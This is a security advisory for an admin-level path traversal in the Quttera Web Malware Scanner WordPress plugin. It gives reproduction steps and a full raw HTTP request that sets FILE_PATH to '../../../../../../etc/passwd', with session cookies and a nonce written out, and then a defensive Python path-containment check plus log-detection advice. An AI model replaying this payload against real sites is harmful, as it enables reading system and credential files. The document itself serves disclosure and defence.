wpexploit | Dmitrii Ignatyev | WPEX-ID:DF892E99-C0F6-42B8-A834-FC55D1BDE130
History: Nov 21, 2023 - 12:00 a.m.

Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal

Tags: quttera web malware scanner, admin panel, path traversal, exploit, file, security measures

AI Score: 9.5 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 33.5%)

Description: The plugin does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks.

1) Go to http://your_site/wordpress/wp-admin/admin.php?page=quttera_wm_scanner_int
2) Click "Scan Now"
3) Click "Detected Threats"
4) Navigate to some Suspicious file and click "Show File"
5) Change FILE_PATH to ../../../../../../../../etc/passwd

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_site/wordpress/wp-admin/admin.php?page=quttera_wm_scanner_int
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://your_site
Connection: close
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1699587855%7CrswNcdL929eZrRPTUd60ql5Vks17rzsIQiUjXec1dLx%7C8956fb23f485c0c0c418affb72358dbe444bd623bb174212c56eb8ac2b48b0aa; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D1%26mfold%3Do%26editor%3Dtinymce%26align%3Dleft%26urlbutton%3Dfile; wp-settings-time-1=1699383612; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1699587855%7CrswNcdL929eZrRPTUd60ql5Vks17rzsIQiUjXec1dLx%7C91aaea805c33ffcb23969eed608e2bc3cbdf6dceb9c198755a280c02dfa88c1a
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=scanner-show_file&FILE_PATH=../../../../../../etc/passwd&_wpnonce=6603ebee0c
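The request above passes FILE_PATH straight into a filesystem path. The check the handler is missing is a containment test: resolve the requested path against the directory the scanner is allowed to read and refuse anything that escapes it. The following is an added Python example (not the plugin's PHP code); the base directory, the helper names and the sample request bodies are assumptions made for the illustration.

```python
import os
from urllib.parse import parse_qs

# Assumed allowed root for the "show file" feature (constructed for this example).
ALLOWED_ROOT = "/var/www/wordpress/wp-content"


def resolve_show_file(base_dir, file_path):
    """Return the absolute path if file_path stays inside base_dir, else None.

    realpath() collapses '..' segments and follows symlinks, so the comparison
    is made on the final resolved location rather than on the raw string.
    A leading '/' is also rejected because os.path.join discards base_dir
    when the second argument is absolute.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, file_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def check_request_body(base_dir, body):
    """Validate an admin-ajax body for the scanner-show_file action.

    parse_qs already percent-decodes each value once; the value is not
    decoded again, so a double-encoded '%252e%252e' stays a literal name
    rather than being turned into '..' by a second decoding pass.
    """
    params = parse_qs(body)
    if params.get("action") != ["scanner-show_file"]:
        return None  # not the action this check covers
    file_path = params.get("FILE_PATH", [""])[0]
    return resolve_show_file(base_dir, file_path)


if __name__ == "__main__":
    # Constructed bodies: the traversal from the advisory and a legitimate one.
    traversal = "action=scanner-show_file&FILE_PATH=../../../../../../etc/passwd&_wpnonce=6603ebee0c"
    legit = "action=scanner-show_file&FILE_PATH=uploads/2023/suspicious.php&_wpnonce=6603ebee0c"
    print("traversal ->", check_request_body(ALLOWED_ROOT, traversal))  # None
    print("legit     ->", check_request_body(ALLOWED_ROOT, legit))
```

For detection, the same parse over web-server or WAF logs flags any scanner-show_file request whose resolved path leaves the allowed root, which is a higher-signal check than matching the literal string "../".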
